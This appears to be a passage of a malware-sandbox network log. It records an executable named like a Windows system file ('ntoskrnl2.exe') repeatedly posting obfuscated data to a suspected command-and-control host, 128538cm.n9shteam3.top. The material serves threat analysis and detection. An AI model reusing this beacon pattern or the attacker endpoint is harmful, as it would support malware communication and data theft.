                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            86192.168.2.64983380.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:35:03.068628073 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:03.415637970 CEST1028OUTData Raw: 50 51 5a 5f 5e 49 59 53 5b 5f 56 5a 57 5f 50 5a 55 50 5e 42 50 59 5a 51 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PQZ_^IYS[_VZW_PZUP^BPYZQYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$3">?+$'!53.<.<,4?05*8U*0^=1.]::%^./]+
                                                            Sep 2, 2024 13:35:03.720129967 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:03.841665030 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:03 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            87192.168.2.64983480.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:35:03.964816093 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:04.321918011 CEST1028OUTData Raw: 55 57 5a 52 5e 46 59 50 5b 5f 56 5a 57 5c 50 5f 55 5e 5e 49 50 5e 5a 58 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: UWZR^FYP[_VZW\P_U^^IP^ZXYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'Z$".(;7Y32*$&>=;,?&<6?8()'8_?1.]:*%^./]+,
                                                            Sep 2, 2024 13:35:04.637662888 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:04.764992952 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:04 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            88192.168.2.64983580.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:35:05.275333881 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1340
                                                            Expect: 100-continue


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            89192.168.2.64983680.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:35:05.630213022 CEST346OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Sep 2, 2024 13:35:05.977963924 CEST1028OUTData Raw: 50 55 5f 56 5e 40 59 51 5b 5f 56 5a 57 5e 50 58 55 50 5e 49 50 53 5a 5c 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PU_V^@YQ[_VZW^PXUP^IPSZ\YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$$W>+^#'21Z%-%+-$\/4(Z&,!*(')7<*2*-*%^./]+$
                                                            Sep 2, 2024 13:35:06.237993002 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:06.484188080 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:05 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ
                                                            Sep 2, 2024 13:35:06.844603062 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:05 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            90192.168.2.64983780.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:35:06.846919060 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1016
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:07.196739912 CEST1016OUTData Raw: 55 52 5a 57 5e 46 59 56 5b 5f 56 5a 57 5d 50 5a 55 5e 5e 48 50 58 5a 5b 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: URZW^FYV[_VZW]PZU^^HPXZ[YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'^3":=+'3%Z'"?(\, ')S<0V*$$[=].:%^./]+
                                                            Sep 2, 2024 13:35:07.495337963 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:07.705408096 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:07 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            91192.168.2.64983880.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:35:07.941667080 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:08.290469885 CEST1028OUTData Raw: 50 55 5f 54 5b 44 59 51 5b 5f 56 5a 57 55 50 59 55 5b 5e 41 50 58 5a 5a 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PU_T[DYQ[_VZWUPYU[^APXZZYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$$!.?^$%Z'.5<=(^,4?0=*(;=7;>"&.%^./]+
                                                            Sep 2, 2024 13:35:09.551203966 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:09.551887035 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:08 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ
                                                            Sep 2, 2024 13:35:09.552232027 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:08 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ
                                                            Sep 2, 2024 13:35:09.552879095 CEST183INHTTP/1.1 100 Continue
                                                            Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 30 32 20 53 65 70 20 32 30 32 34 20 31 31 3a 33 35 3a 30 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 34 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 0d 0a 31 56 59 5a
                                                            Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Mon, 02 Sep 2024 11:35:08 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4Connection: keep-alive1VYZ
                                                            Sep 2, 2024 13:35:09.553584099 CEST183INHTTP/1.1 100 Continue
                                                            Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 30 32 20 53 65 70 20 32 30 32 34 20 31 31 3a 33 35 3a 30 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 34 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 0d 0a 31 56 59 5a
                                                            Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Mon, 02 Sep 2024 11:35:08 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4Connection: keep-alive1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            92192.168.2.64983980.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:35:09.691390038 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:10.040709972 CEST1028OUTData Raw: 55 53 5f 55 5e 46 5c 56 5b 5f 56 5a 57 55 50 5b 55 5e 5e 40 50 5c 5a 5a 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: US_U^F\V[_VZWUP[U^^@P\ZZYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'$%\=+'X0$*?[-4$++0>$'=9:%^./]+
                                                            Sep 2, 2024 13:35:10.333755970 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:10.538333893 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:09 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            93192.168.2.64984080.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:35:10.680849075 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:11.038419962 CEST1028OUTData Raw: 50 54 5a 52 5e 48 5c 50 5b 5f 56 5a 57 5b 50 5b 55 59 5e 44 50 5e 5a 5a 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PTZR^H\P[_VZW[P[UY^DP^ZZYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'3!X+;$%15Z$X)($-' X&<*(((4+=:*%^./]+0
                                                            Sep 2, 2024 13:35:11.354198933 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:11.486713886 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:10 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            94192.168.2.64984180.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:35:10.745142937 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1312
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:11.103883028 CEST1312OUTData Raw: 55 5e 5f 52 5e 41 59 56 5b 5f 56 5a 57 5f 50 5e 55 5a 5e 40 50 52 5a 5e 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: U^_R^AYV[_VZW_P^UZ^@PRZ^YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\''1<,'2_0=*X>-4-7$X$5T*('(4>!:_9%^./]+
                                                            Sep 2, 2024 13:35:11.393393993 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:11.617532015 CEST308INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:10 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 152
                                                            Connection: keep-alive
                                                            Data Raw: 03 1e 23 0a 23 27 2f 57 27 28 37 07 2a 29 04 58 3c 03 2b 18 2c 2f 0a 59 33 17 09 5f 3c 0b 21 50 31 29 21 58 29 3f 36 03 3c 1c 0b 55 35 34 20 5b 03 1f 25 5a 34 1c 21 09 25 3b 3a 01 27 09 22 5f 35 37 05 04 29 2e 25 0a 27 03 30 1f 37 32 3a 55 2f 13 26 50 32 06 3f 02 3a 2f 29 04 32 04 2a 56 08 16 38 51 3c 3c 08 1b 23 0e 23 11 23 06 36 0b 20 08 2f 52 24 0d 05 1c 25 2a 00 0b 24 00 3b 1d 2a 5b 2c 01 30 07 22 04 34 23 2a 09 2d 03 24 50 2e 02 2d 56 03 30 57 53
                                                            Data Ascii: ##'/W'(7*)X<+,/Y3_<!P1)!X)?6<U54 [%Z4!%;:'"_57).%'072:U/&P2?:/)2*V8Q<<###6 /R$%*$;*[,0"4#*-$P.-V0WS
                                                            Sep 2, 2024 13:35:11.627918005 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1024
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:11.828557014 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:11.837337971 CEST1024OUTData Raw: 50 55 5f 54 5e 45 59 57 5b 5f 56 5a 57 5d 50 52 55 5d 5e 49 50 5c 5a 5a 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PU_T^EYW[_VZW]PRU]^IP\ZZYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'3"%]+]'='1+=';$]'<8)' >).%^./]+
                                                            Sep 2, 2024 13:35:12.127609968 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:11 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            95192.168.2.64984280.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:35:12.629678965 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:12.980429888 CEST1028OUTData Raw: 55 57 5a 54 5e 42 5c 53 5b 5f 56 5a 57 54 50 59 55 50 5e 43 50 5c 5a 50 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: UWZT^B\S[_VZWTPYUP^CP\ZPYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$$=(,%1=Z'=)+-,/$#'?6?8(($?"*^9%^./]+
                                                            Sep 2, 2024 13:35:13.493069887 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:13.494105101 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:12 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ
                                                            Sep 2, 2024 13:35:13.494215965 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:12 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            96192.168.2.64984380.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:35:13.660851002 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:14.009232044 CEST1028OUTData Raw: 55 57 5a 5e 5e 44 5c 56 5b 5f 56 5a 57 5f 50 59 55 58 5e 43 50 53 5a 51 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: UWZ^^D\V[_VZW_PYUX^CPSZQYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'X$W:?^<$=Z$>X+-/'Z6<8+($$[>2%:*%^./]+
                                                            Sep 2, 2024 13:35:14.334122896 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:14.465325117 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:13 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            97192.168.2.64984480.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:35:14.605779886 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:15.133904934 CEST1028OUTData Raw: 50 53 5a 51 5e 44 59 54 5b 5f 56 5a 57 54 50 58 55 5e 5e 45 50 59 5a 5d 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PSZQ^DYT[_VZWTPXU^^EPYZ]YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'Y0!+;$'T"'>:(=,4?'<=S<(''=:*%^./]+
                                                            Sep 2, 2024 13:35:15.250412941 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:15.472609043 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:14 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            98192.168.2.64984580.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:35:15.674933910 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:16.056510925 CEST1028OUTData Raw: 50 51 5a 5f 5e 47 5c 54 5b 5f 56 5a 57 5c 50 58 55 5c 5e 48 50 5d 5a 5f 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
